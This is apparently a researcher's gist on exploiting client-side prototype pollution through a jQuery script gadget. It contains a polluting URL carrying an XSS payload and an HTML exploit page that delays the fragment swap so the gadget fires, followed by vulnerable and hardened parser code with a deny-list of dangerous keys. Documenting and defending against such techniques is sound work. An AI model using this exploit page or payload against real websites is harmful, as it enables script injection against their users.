@harisec
Last active January 24, 2022 10:02
I was trying to exploit a client-side prototype pollution and nothing was working.

I figured out that if you try to use a script gadget by visiting a URL like this directly:

https://example.com/#&__proto__[context]=<img/src/onerror%3dalert(1)>&__proto__[jquery]=x

it will not work, because the page will not load properly: the prototype pollution breaks the page.

So, I managed to get it working by first loading the page without the prototype pollution exploit and then after a few seconds replace the location with the prototype pollution exploit URL.

Example exploit page:

<script>
// Open the target in a new tab without the payload so it initialises normally,
// then, after a few seconds, swap in the prototype pollution URL.
function exploit() {
	var win = window.open("https://example.com/#", "_blank");
	setTimeout(function () {
		// Only the fragment differs from the URL already loaded, so this does
		// not reload the page; the already-initialised gadget picks up the
		// polluted properties instead of the pollution breaking page load.
		win.location.replace("https://example.com/#&__proto__[context]=<img/src/onerror%3dalert(1)>&__proto__[jquery]=x");
	}, 5000);
}
</script>

<button onclick="exploit();">click me</button>
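Added example, not part of the gist: the kind of fragment-parameter parser that lets `#&__proto__[context]=...` reach `Object.prototype`, beside a hardened version that uses prototype-less containers and drops `__proto__`, `constructor` and `prototype` path segments. The parser shape and the bracket syntax are assumptions; the sample fragment is the one from the gist.

```javascript
// Keys that must never be used as property names on an object built from user input.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Splits "a[b]=c" into the path ["a", "b"] and the decoded value "c" (assumed syntax).
function splitPair(pair) {
  const eq = pair.indexOf("=");
  const rawKey = eq === -1 ? pair : pair.slice(0, eq);
  const value = eq === -1 ? "" : decodeURIComponent(pair.slice(eq + 1));
  const path = rawKey.split(/\[|\]\[|\]/).filter((p) => p.length > 0);
  return { path, value };
}

// Walks the bracket path, creating intermediate containers with `makeContainer`,
// and assigns the value at the leaf. `reject` decides whether a path is dropped.
function parseFragment(fragment, makeContainer, reject) {
  const result = makeContainer();
  for (const pair of fragment.replace(/^#?&?/, "").split("&")) {
    if (!pair) continue;
    const { path, value } = splitPair(pair);
    if (path.length === 0 || reject(path)) continue;
    let node = result;
    for (let i = 0; i < path.length - 1; i++) {
      const seg = path[i];
      if (typeof node[seg] !== "object" || node[seg] === null) node[seg] = makeContainer();
      node = node[seg]; // for a plain {} and seg "__proto__" this is Object.prototype
    }
    node[path[path.length - 1]] = value;
  }
  return result;
}

// Vulnerable: plain objects and no key filtering, so "__proto__[context]=x"
// ends up writing Object.prototype.context = "x".
function parseFragmentVulnerable(fragment) {
  return parseFragment(fragment, () => ({}), () => false);
}

// Hardened: null-prototype containers (so "__proto__" is just an own property)
// plus a deny-list on every path segment as defence in depth.
function parseFragmentHardened(fragment) {
  return parseFragment(
    fragment,
    () => Object.create(null),
    (path) => path.some((seg) => FORBIDDEN_KEYS.has(seg))
  );
}

// Detection helper: true if some earlier parse has polluted Object.prototype.
function isPrototypePolluted(name) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, name);
}
```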